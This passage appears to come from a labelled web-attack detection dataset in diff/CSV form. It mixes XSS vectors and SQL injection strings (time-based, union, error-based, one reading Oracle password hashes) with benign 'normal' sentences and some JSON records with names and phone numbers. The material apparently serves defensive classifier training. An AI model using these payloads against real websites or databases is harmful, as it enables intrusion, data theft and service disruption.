+
"<style>@keyframes slidein {}</style><bdi style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></bdi>",1,XSS,422
|
422 |
+
"1 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) # bzoq",2,SQLi,13722
|
423 |
+
"AND ELT(1337=1337,SLEEP(5)) AND 1337"" LIKE ""1337",2,SQLi,18662
|
424 |
+
<img onload=alert(1)>//INJECTX,1,XSS,9574
|
425 |
+
"It is evident that accurate knowledge of the character and structure of the rock-formations in petroliferous territories is of the greatest importance in enabling the expert to select favourable sites for drilling operations; hence on well-conducted petroleumproperties it is now customary to note the character and thickness of the strata perforated by the drill, so that a complete section may be prepared from the recorded data.",3,normal,25972
|
426 |
+
1 WAITFOR DELAY '0:0:5'--,2,SQLi,21035
|
427 |
+
"-8538"" or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,10893
|
428 |
+
") and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,19561
|
429 |
+
-4803%' ) ) or 8571 = 8571--,2,SQLi,20831
|
430 |
+
"<base onkeypress=""alert(1)"" contenteditable>test</base>",1,XSS,4570
|
431 |
+
"waitfor delay '0:0:5' and ( ( ""%"" = """,2,SQLi,19907
|
432 |
+
"-8919"" or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""nstr"" = ""nstr",2,SQLi,10311
|
433 |
+
-1252' ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 'pzxh' like 'pzxh,2,SQLi,10152
|
434 |
+
She'll select the dessert.,3,normal,24452
|
435 |
+
"The Consumer Staples Select Sector SPDR ETF (XLP) and the Utilities Select Sector SPDR ETF (XLU) are up 5.95 percent and 1.63 percent, respectively, since Oct. 1.",3,normal,25472
|
436 |
+
"-3420 where 9681 = 9681 or make_set ( 2438 = 1977,1977 ) --",2,SQLi,17274
|
437 |
+
"<area oncopy=""alert(1)"" contenteditable>test</area>",1,XSS,5420
|
438 |
+
"1"" ) where 7165 = 7165 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,15493
|
439 |
+
"<em onmousemove=""alert(1)"">test</em>",1,XSS,8940
|
440 |
+
"<style>@keyframes x{}</style><big style=""animation-name:x"" onanimationend=""alert(1)""></big>",1,XSS,1714
|
441 |
+
1 ) ) as vryv where 5600 = 5600,2,SQLi,20432
|
442 |
+
"<INPUT TYPE=""IMAGE"" SRC=""javascript:javascript:alert(1);"">",1,XSS,3797
|
443 |
+
"-8929%' ) union all select 9486,9486,9486,9486#",2,SQLi,18829
|
444 |
+
"<menuitem oncut=""alert(1)"" contenteditable>test</menuitem>",1,XSS,3887
|
445 |
+
"<td ondblclick=""alert(1)"">test</td>",1,XSS,9055
|
446 |
+
""",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,17563
|
447 |
+
<legend id=x tabindex=1 onfocus=alert(1)></legend>,1,XSS,5687
|
448 |
+
<listing id=x tabindex=1 onfocusin=alert(1)></listing>,1,XSS,4744
|
449 |
+
"<rt onbeforepaste=""alert(1)"" contenteditable>test</rt>",1,XSS,4673
|
450 |
+
"-4932%"" ) ) or ( 3076 = 5927 ) *5927 and ( ( ""%"" = """,2,SQLi,18230
|
451 |
+
"Select from steak, seafood, chicken or enjoy freshly prepared sushi.",3,normal,25632
|
452 |
+
Consumers in rural areas should either select a 2.4 Ghz or 5.8 Ghz phone because rarely will you need to worry about interference or someone listening to your call.,3,normal,26274
|
453 |
+
"-3250%"" union all select 7162,7162,7162,7162,7162,7162,7162,7162,7162--",2,SQLi,16097
|
454 |
+
"1' where 6963 = 6963 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11831
|
455 |
+
Calculate sums where needed.,3,normal,23260
|
456 |
+
I select.,3,normal,24454
|
457 |
+
"1%' ) ) ) union all select null,null,null,null,null,null,null#",2,SQLi,16938
|
458 |
+
<isindex id=x tabindex=1 onbeforeactivate=alert(1)></isindex>,1,XSS,3338
|
459 |
+
"admin""or 1=1 or """"=""",2,SQLi,21718
|
460 |
+
-4892%' ) ) or 2251 = 9881--,2,SQLi,20797
|
461 |
+
1' rlike ( select ( case when ( 1916 = 7874 ) then 1 else 0x28 end ) ) and 'ughq' = 'ughq,2,SQLi,14759
|
462 |
+
<base onblur=alert(1) tabindex=1 id=x></base><input autofocus>,1,XSS,3195
|
463 |
+
"<ruby onclick=""alert(1)"">test</ruby>",1,XSS,8835
|
464 |
+
"1%"" ) ) and 8316 = 6410#",2,SQLi,21214
|
465 |
+
1%' ) ) and 9198 = 9198--,2,SQLi,21074
|
466 |
+
"Finally, select that you're interested in dry ice to get the stores that will best cater to your needs.",3,normal,26200
|
467 |
+
"1%' ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( '%' = '",2,SQLi,12615
|
468 |
+
"<script src=""javascript:alert(3)""></script> // IE6, O11.01â, OM10.1â//[""'`-->]]>]</div>",1,XSS,1840
|
469 |
+
"{""id"":null,""firstName"":""Judy"",""lastName"":""Tan"",""address"":""201 Hawk Ct"",""city"":""800"",""telephone"":""5126114889""}",3,normal,26963
|
470 |
+
"{""id"":null,""firstName"":""Rahiman"",""lastName"":""Ibrahim"",""address"":""#02-266, 2019 Bukit Batok Street 23"",""city"":""440"",""telephone"":""3504787265""}",3,normal,27120
|
471 |
+
"<ruby ondblclick=""alert(1)"">test</ruby>",1,XSS,8199
|
472 |
+
"<math><a xlink:href=//jsfiddle.net/t846h/"">click",1,XSS,5859
|
473 |
+
"<style>:target {transform: rotate(180deg);}</style><rt id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></rt>",1,XSS,699
|
474 |
+
"<img onpaste=""alert(1)"" contenteditable>test</img>",1,XSS,5556
|
475 |
+
<SCRIPT>a=/XSS/,1,XSS,9807
|
476 |
+
<script>alert(/XSSâ)</script>,1,XSS,9598
|
477 |
+
"1%"" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ""%"" = """,2,SQLi,12995
|
478 |
+
"-5205' ) ) union all select 8592,8592,8592,8592,8592,8592--",2,SQLi,17261
|
479 |
+
cross,3,normal,23156
|
480 |
+
"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><select id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></select>",1,XSS,179
|
481 |
+
"<area onmousemove=""alert(1)"">test</area>",1,XSS,8054
|
482 |
+
"1' ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( 'cqrp' = 'cqrp",2,SQLi,12861
|
483 |
+
<link onfocusout=alert(1) tabindex=1 id=x></link><input autofocus>,1,XSS,2728
|
484 |
+
"0\""autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>""-confirm(3)-""",1,XSS,2119
|
485 |
+
1'|| ( select 'yhpe' where 8010 = 8010 rlike ( select ( case when ( 7910 = 3752 ) then 1 else 0x28 end ) ) ) ||',2,SQLi,13510
|
486 |
+
<aside onfocusout=alert(1) tabindex=1 id=x></aside><input autofocus>,1,XSS,2636
|
487 |
+
Where's the yoga class?,3,normal,23659
|
488 |
+
"1"" waitfor delay '0:0:5'",2,SQLi,21223
|
489 |
+
"-8655 ) where 3910 = 3910 union all select 3910,3910#",2,SQLi,18111
|
490 |
+
"1"" ) ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( ""epwi"" like ""epwi",2,SQLi,11314
|
491 |
+
<strike id=x tabindex=1 onbeforeactivate=alert(1)></strike>,1,XSS,3706
|
492 |
+
"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( PASSWORD ) FROM ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ ) WHERE LIMIT = 6 ) ) AND 'i' = 'i",2,SQLi,11627
|
493 |
+
"1"" where 8234 = 8234",2,SQLi,21862
|
494 |
+
"<button draggable=""true"" ondragstart=""alert(1)"">test</button>",1,XSS,3380
|
495 |
+
Delete the irrelevant comments.,3,normal,22677
|
496 |
+
"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--",2,SQLi,14666
|
497 |
+
"<shadow onmousemove=""alert(1)"">test</shadow>",1,XSS,6838
|
498 |
+
begin if ( 5624 = 5624 ) then dbms_lock.sleep ( 5 ),2,SQLi,18313
|
499 |
+
"1'|| ( select 'nbmo' from dual where 5572 = 5572 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,13158
|
500 |
+
"<frame onmouseleave=""alert(1)"">test</frame>",1,XSS,7171
|
501 |
+
That additional money goes to select charities supported by the company.,3,normal,25499
|
502 |
+
1%' ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( '%' = ',2,SQLi,10569
|
503 |
+
if ( 5896 = 4251 ) select 5896 else drop function xmyk--,2,SQLi,17620
|
504 |
+
<sub id=x tabindex=1 onbeforeactivate=alert(1)></sub>,1,XSS,4968
|
505 |
+
"<style>:target {color:red;}</style><hgroup id=x style=""transition:color 1s"" ontransitionend=alert(1)></hgroup>",1,XSS,1014
|
506 |
+
ORDER BY 3#,2,SQLi,22361
|
507 |
+
"1"" ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15806
|
508 |
+
"1234 ' AND 1 = 0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",2,SQLi,15482
|
509 |
+
"<spacer onmousemove=""alert(1)"">test</spacer>",1,XSS,6874
|
510 |
+
select ( case when ( 6002 = 9048 ) then 6002 else 6002* ( select 6002 from mysql.db ) end ) #,2,SQLi,14533
|
511 |
+
"-8200' in boolean mode ) union all select 3360,3360--",2,SQLi,18135
|
512 |
+
"<content onkeydown=""alert(1)"" contenteditable>test</content>",1,XSS,3475
|
513 |
+
"1"" ) as yecj where 1194 = 1194 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14023
|
514 |
+
Where's your SQL project?,3,normal,23427
|
515 |
+
"1' ) where 3375 = 3375 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12654
|
516 |
+
"If you touch and hold your finger on a space where text can occupy, you'll see options to Select and Select All.",3,normal,26049
|
517 |
+
"<article onmousemove=""alert(1)"">test</article>",1,XSS,6336
|
518 |
+
"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( '%' = '",2,SQLi,12323
|
519 |
+
1' or sleep ( 5 ) #,2,SQLi,21947
|
520 |
+
admin' ) or '1' = '1'--,2,SQLi,21277
|
521 |
+
"<tr draggable=""true"" ondragstart=""alert(1)"">test</tr>",1,XSS,4892
|
522 |
+
"1', ( select ( case when ( 8596 = 8596 ) then 1 else 8596* ( select 8596 from mysql.db ) end ) )",2,SQLi,14344
|
523 |
+
Select your race.,3,normal,24926
|
524 |
+
"<summary draggable=""true"" ondragleave=""alert(1)"">test</summary>",1,XSS,3026
|
525 |
+
"<STYLE>@im\port'\ja\vasc\ript:alert(\""XSS\"")';</STYLE>",1,XSS,2500
|
526 |
+
"\"";;alert(';XSS';);//",1,XSS,9752
|
527 |
+
"-9087"" order by 1#",2,SQLi,22042
|
528 |
+
"1' or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )",2,SQLi,11869
|
529 |
+
"jaVasCript:/*-/*`/*\`/*'/*""/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e",1,XSS,503
|
530 |
+
<spacer onpointerenter=alert(1)>XSS</spacer>,1,XSS,6875
|
531 |
+
"-7731"" ) ) or make_set ( 2551 = 4389,4389 ) and ( ( ""unly"" like ""unly",2,SQLi,16288
|
532 |
+
"-1963 union all select 6831,6831,6831,6831,6831,6831,6831,6831#",2,SQLi,16832
|
533 |
+
1' rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and 'hyun' like 'hyun,2,SQLi,14597
|
534 |
+
"{""id"":null,""firstName"":""Pauline"",""lastName"":""Fong"",""address"":""1 CLINTON AVE, ALBANY NY 12207"",""city"":""238"",""telephone"":""1467501124""}",3,normal,27502
|
535 |
+
"1' in boolean mode ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) #",2,SQLi,11232
|
536 |
+
"1%"" ) and make_set ( 9956 = 1060,1060 ) and ( ""%"" = """,2,SQLi,18092
|
537 |
+
Where's the podiatrist?,3,normal,23634
|
538 |
+
"<var draggable=""true"" ondragend=""alert(1)"">test</var>",1,XSS,5051
|
539 |
+
"1' and make_set ( 2942 = 8200,8200 ) and 'jnhv' like 'jnhv",2,SQLi,17360
|
540 |
+
Retrieve rows where applicable.,3,normal,23300
|
541 |
+
"<canvas onbeforecut=""alert(1)"" contenteditable>test</canvas>",1,XSS,3460
|
542 |
+
"-5972"" or 8509 = 3448#",2,SQLi,21459
|
543 |
+
1' in boolean mode ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,16186
|
544 |
+
<,1,XSS,9845
|
545 |
+
"select * from users where id = 1 or "" ) ."" = 1 or 1 = 1 -- 1",2,SQLi,17126
|
546 |
+
"1' ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( 'xzlx' like 'xzlx",2,SQLi,10687
|
547 |
+
-3105' or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and 'srep' = 'srep,2,SQLi,10603
|
548 |
+
"1"" ) as hsws where 6656 = 6656",2,SQLi,20579
|
549 |
+
<mark id=x tabindex=1 onactivate=alert(1)></mark>,1,XSS,5786
|
550 |
+
"<nav onpaste=""alert(1)"" contenteditable>test</nav>",1,XSS,5552
|
551 |
+
"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23",2,SQLi,9897
|
552 |
+
"1 ) ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13387
|
553 |
+
"-3461"" ) ) union all select 6342,6342,6342,6342,6342,6342#",2,SQLi,17370
|
554 |
+
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>,1,XSS,43
|
555 |
+
"<div draggable=""true"" contenteditable>drag me</div><ruby ondrop=alert(1) contenteditable>drop here</ruby>",1,XSS,1235
|
556 |
+
"From there, select Language and Input and then On-screen Keyboard.",3,normal,26157
|
557 |
+
1' in boolean mode ),2,SQLi,21847
|
558 |
+
"<script> setTimeout(\\""writetitle()\\"",$\_GET\[\]) </script>",1,XSS,3499
|
559 |
+
"<b oncontextmenu=""alert(1)"">test</b>",1,XSS,8843
|
560 |
+
RLIKE SLEEP(5) OR '1337'='1337,2,SQLi,20518
|
561 |
+
1' and 7533 = 7533,2,SQLi,22066
|
562 |
+
<cite id=x tabindex=1 onfocusin=alert(1)></cite>,1,XSS,5973
|
563 |
+
<div onpointerleave=alert(1)>XSS</div>,1,XSS,8320
|
564 |
+
<q id=x tabindex=1 onfocusin=alert(1)></q>,1,XSS,7400
|
565 |
+
><img src=x onerror=javascript:alert(A)>,1,XSS,7828
|
566 |
+
"1' where 8451 = 8451 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,15054
|
567 |
+
"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 7 ) ) AND 'i' = 'i",2,SQLi,11462
|
568 |
+
"<shadow draggable=""true"" ondragend=""alert(1)"">test</shadow>",1,XSS,3695
|
569 |
+
1 waitfor delay '0:0:5'-- nnnp,2,SQLi,20549
|
570 |
+
(SELECT * FROM (SELECT(SLEEP(5)))YYYY),2,SQLi,19670
|
571 |
+
"Home Depot: Save up to 40% off select bath & kitchen essentials, up to 753% off select bedding, up to 30% off select storage solutions.",3,normal,26092
|
572 |
+
"-8060"" ) where 5290 = 5290 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --",2,SQLi,12735
|
573 |
+
<SCRIPT SRC=%(jscript)s?<B>,1,XSS,9647
|
574 |
+
<data id=x tabindex=1 ondeactivate=alert(1)></data><input id=y autofocus>,1,XSS,2310
|
575 |
+
"1%"" or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,19469
|
576 |
+
"1"" ) where 9855 = 9855",2,SQLi,21493
|
577 |
+
group by userid having 1=1--,2,SQLi,20783
|
578 |
+
"<style>:target {transform: rotate(180deg);}</style><cite id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></cite>",1,XSS,653
|
579 |
+
1' ) ) as uizu where 1774 = 1774,2,SQLi,20339
|
580 |
+
"1' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( 'gwew' like 'gwew",2,SQLi,12092
|
581 |
+
<aside onpointerup=alert(1)>XSS</aside>,1,XSS,8140
|
582 |
+
"<style>@keyframes slidein {}</style><area style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></area>",1,XSS,401
|
583 |
+
<button id=x tabindex=1 ondeactivate=alert(1)></button><input id=y autofocus>,1,XSS,2144
|
584 |
+
"<a href=""\xE2\x80\x88javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2014
|
585 |
+
1' ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( 'cbnc' like 'cbnc,2,SQLi,10323
|
586 |
+
<output id=x tabindex=1 onfocusin=alert(1)></output>,1,XSS,5132
|
587 |
+
"-1684"" ) ) ) union all select 7473,7473#",2,SQLi,19467
|
588 |
+
"<object onbeforecut=""alert(1)"" contenteditable>test</object>",1,XSS,3495
|
589 |
+
"1"" ) ) as ufba where 4049 = 4049",2,SQLi,20256
|
590 |
+
"<p onkeyup=""alert(1)"" contenteditable>test</p>",1,XSS,6425
|
591 |
+
"1"" and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ""mynm"" like ""mynm",2,SQLi,15551
|
592 |
+
"1' ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( 'tpcm' like 'tpcm",2,SQLi,11402
|
593 |
+
"-1339 ) ) ) union all select 2938,2938,2938,2938,2938,2938#",2,SQLi,17239
|
594 |
+
Where's the perfect spot to unwind?,3,normal,23940
|
595 |
+
"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'kyos' like 'kyos",2,SQLi,14353
|
596 |
+
1'|| ( select 'irfn' where 8360 = 8360,2,SQLi,19779
|
597 |
+
"1"" ) as pobe where 1704 = 1704",2,SQLi,20558
|
598 |
+
"<style>@keyframes slidein {}</style><legend style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></legend>",1,XSS,368
|
599 |
+
select,3,normal,23107
|
600 |
+
"<link onkeyup=""alert(1)"" contenteditable>test</link>",1,XSS,5131
|
601 |
+
Select your check.,3,normal,25000
|
602 |
+
"{""id"":null,""name"":""enough""}",3,normal,26768
|
603 |
+
"-5857%"" ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ""%"" = """,2,SQLi,10411
|
604 |
+
"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""qwdi"" = ""qwdi",2,SQLi,12088
|
605 |
+
"<button onbeforepaste=""alert(1)"" contenteditable>test</button>",1,XSS,3211
|
606 |
+
or SELECT SLEEP(5); #,2,SQLi,21572
|
607 |
+
-2960' or 2163 = 3143--,2,SQLi,21304
|
608 |
+
<BODY ONLOAD=alert('XSS')>,1,XSS,7333
|
609 |
+
<video id=x tabindex=1 onbeforedeactivate=alert(1)></video><input autofocus>,1,XSS,2187
|
610 |
+
-1940 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ),2,SQLi,10864
|
611 |
+
Join us for lunch.,3,normal,22768
|
612 |
+
"To change the format, go to your Memories, select the story you want to share, tap ""Export Story"" and select the style you prefer.",3,normal,25284
|
613 |
+
"<style>@keyframes slidein {}</style><base style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></base>",1,XSS,403
|
614 |
+
1%' ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( ( '%' = ',2,SQLi,15158
|
615 |
+
select ( case when ( 7169 = 7785 ) then 1 else 7169* ( select 7169 from master..sysdatabases ) end ) --,2,SQLi,13979
|
616 |
+
"-3828%"" ) ) ) or make_set ( 1765 = 8657,8657 ) and ( ( ( ""%"" = """,2,SQLi,16754
|
617 |
+
"1'|| ( select 'skds' from dual where 8594 = 8594 and make_set ( 6779 = 2027,2027 ) ) ||'",2,SQLi,14783
|
618 |
+
"1"" ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ""ureu"" like ""ureu",2,SQLi,11945
|
619 |
+
1 ) ) as zoso where 3633 = 3633,2,SQLi,20431
|
620 |
+
"1 ) ) ) and make_set ( 8882 = 1593,1593 ) and ( ( ( 7989 = 7989",2,SQLi,16881
|
621 |
+
1 ) ) ) and 7533 = 7533 and ( ( ( 7740 = 7740,2,SQLi,19037
|
622 |
+
1'|| ( select 'iuud' where 3687 = 3687,2,SQLi,19774
|
623 |
+
window['a'+'l'+'e'+'r'+'t'](),1,XSS,9605
|
624 |
+
<strike id=x tabindex=1 ondeactivate=alert(1)></strike><input id=y autofocus>,1,XSS,2136
|
625 |
+
I'll order a tasty dessert.,3,normal,22999
|
626 |
+
"{""id"":null,""name"":""Charmeleon""}",3,normal,27191
|
627 |
+
<address id=x tabindex=1 onfocusin=alert(1)></address>,1,XSS,4769
|
628 |
+
"<table background=""javascript:javascript:alert(1)"">",1,XSS,5335
|
629 |
+
1' ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 'njge' like 'njge,2,SQLi,10478
|
630 |
+
"1' ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( 'aduc' = 'aduc",2,SQLi,10605
|
631 |
+
Where can I select a course for personal growth?,3,normal,23838
|
632 |
+
"<div draggable=""true"" contenteditable>drag me</div><datalist ondrop=alert(1) contenteditable>drop here</datalist>",1,XSS,875
|
633 |
+
select sleep ( 5 ) and ( 'dcys' like 'dcys,2,SQLi,19265
|
634 |
+
1' ) where 6092 = 6092,2,SQLi,21509
|
635 |
+
"1'|| ( select 'dujx' where 6896 = 6896 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11290
|
636 |
+
Filter out irrelevant comments from the post.,3,normal,22898
|
637 |
+
Select map.,3,normal,24660
|
638 |
+
"-3581'|| ( select 'uxmh' from dual where 8954 = 8954 union all select 8954,8954,8954,8954,8954,8954#",2,SQLi,14131
|
639 |
+
We'll select a leader.,3,normal,24475
|
640 |
+
"1"" ) ) as ihfw where 3949 = 3949 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,12733
|
641 |
+
"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#",2,SQLi,15685
|
642 |
+
"1' ) ) ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11685
|
643 |
+
"1"" ) ) as irrz where 8730 = 8730 order by 1#",2,SQLi,19124
|
644 |
+
"-5779 ) union all select 6089,6089--",2,SQLi,19991
|
645 |
+
Select courier.,3,normal,24707
|
646 |
+
"1 where 3410 = 3410 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12527
|
647 |
+
"<img src=""javascript:alert(2)"">",1,XSS,9511
|
648 |
+
"var contentType = <%=Request.getParameter(""content_type"")%>;",1,XSS,3428
|
649 |
+
"1 and elt ( 3172 = 7243,7243 )",2,SQLi,20651
|
650 |
+
"select * from users where id = 1 or "";,"" = 1 or 1 = 1 -- 1",2,SQLi,17338
|
651 |
+
"In making such comparisons, it is always desirable, if possible, to select as standards longperiod gauges which are so situated that the short-period district lies.",3,normal,26011
|
652 |
+
-1021 ) as erjh where 7845 = 7845 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,10100
|
653 |
+
"-9774' ) ) ) union all select 6954,6954,6954#",2,SQLi,19024
|
654 |
+
select current_setting('log_connections');,2,SQLi,19321
|
655 |
+
TechCrunch and Facebook will select four judges for each theme.,3,normal,25502
|
656 |
+
